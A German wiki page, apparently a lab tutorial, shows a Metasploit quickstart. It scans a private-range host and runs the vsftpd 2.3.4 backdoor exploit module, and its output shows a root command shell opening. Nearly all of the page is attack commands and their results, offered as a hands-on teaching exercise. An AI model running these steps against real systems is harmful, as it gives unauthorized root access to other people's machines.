Metasploit Schnellstart: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| (Eine dazwischenliegende Version desselben Benutzers wird nicht angezeigt) | |||
| Zeile 13: | Zeile 13: | ||
=RHOSTS setzen= | =RHOSTS setzen= | ||
*set RHOSTS 10.0.10.105 | *set RHOSTS 10.0.10.105 | ||
| + | =Exploit= | ||
| + | *exploit | ||
| + | <pre> | ||
| + | [*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) | ||
| + | [*] 10.0.10.105:21 - USER: 331 Please specify the password. | ||
| + | [+] 10.0.10.105:21 - Backdoor service has been spawned, handling... | ||
| + | [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) | ||
| + | [*] Found shell. | ||
| + | [*] Command shell session 1 opened (0.0.0.0:0 -> 10.0.10.105:6200) at 2021-08-07 19:45:30 +0200 | ||
| + | </pre> | ||
| + | =Resultat= | ||
| + | ;Kein Shellprompt aber trotzdem Zugriff - Probiert es aus | ||
Aktuelle Version vom 7. August 2021, 17:47 Uhr
Ping
- ping -c 1 10.0.10.105
Welche Ports sind offen
- nmap -sS 10.0.10.105
Welcher FTP Server läuft
- nmap -sV 10.0.10.105 -p 21
Suchen nach einem Modul
- search vsftp
Modul laden
- use exploit/unix/ftp/vsftpd_234_backdoor
Optionen anzeigen
- show options
RHOSTS setzen
- set RHOSTS 10.0.10.105
Exploit
- exploit
[*] 10.0.10.105:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.0.10.105:21 - USER: 331 Please specify the password. [+] 10.0.10.105:21 - Backdoor service has been spawned, handling... [+] 10.0.10.105:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 opened (0.0.0.0:0 -> 10.0.10.105:6200) at 2021-08-07 19:45:30 +0200
Resultat
- Kein Shellprompt aber trotzdem Zugriff - Probiert es aus